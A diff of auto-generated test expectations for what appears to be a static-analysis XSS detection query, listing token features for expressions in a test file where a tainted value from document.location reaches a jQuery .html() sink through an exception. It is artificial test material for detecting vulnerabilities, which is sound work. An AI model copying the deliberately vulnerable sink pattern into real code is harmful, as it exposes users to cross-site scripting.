foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | exceptional return of function inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | exceptional return of function inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | functio ... (x);\\n\\t} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | functio ... (x);\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | functio ... (x);\\n\\t} | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | functio ... (x);\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | functio ... (x);\\n\\t} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | return of function inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | return of function inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | return of function inner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | return of function inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | return of function inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:11:4:15 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:17:4:17 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:17:4:17 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:17:4:17 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:17:4:17 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:17:4:17 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:17:4:17 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:17:4:17 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:17:4:17 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:17:4:17 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:17:4:17 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:9 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:9 | unknown | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:9 | unknown | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:9 | unknown | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:9 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:12 | exceptional return of unknown(x) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:12 | exceptional return of unknown(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:12 | exceptional return of unknown(x) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:12 | exceptional return of unknown(x) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:12 | exceptional return of unknown(x) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:12 | unknown(x) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:12 | unknown(x) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:12 | unknown(x) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:12 | unknown(x) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:5:3:5:12 | unknown(x) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:5:11:5:11 | x | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:5:11:5:11 | x | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:5:11:5:11 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18790,6 +127784,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:5:11:5:11 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:5:11:5:11 | x | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:5:11:5:11 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:9 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:9 | unknown | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:9 | unknown | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:9 | unknown | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:9 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:14 | exceptional return of unknown(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:14 | exceptional return of unknown(foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:14 | exceptional return of unknown(foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:14 | exceptional return of unknown(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:14 | exceptional return of unknown(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:14 | unknown(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:14 | unknown(foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:14 | unknown(foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:14 | unknown(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:9:3:9:14 | unknown(foo) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:9:11:9:13 | foo | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:9:11:9:13 | foo | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:9:11:9:13 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18797,6 +127806,46 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:9:11:9:13 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:9:11:9:13 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:9:11:9:13 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:10:11:10:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:10:11:10:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:10:11:10:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:10:11:10:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:10:11:10:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:10:11:10:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:10:11:10:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:10:11:10:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:10:11:10:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:10:11:10:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:3:11:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:11:5:11:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:11:5:11:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:11:5:11:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18804,6 +127853,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:11:5:11:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:11:5:11:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:11:5:11:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:13:11:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:13:11:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:13:11:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:13:11:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:11:13:11:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:11:18:11:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:11:18:11:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:11:18:11:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18811,6 +127865,68 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:11:18:11:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown 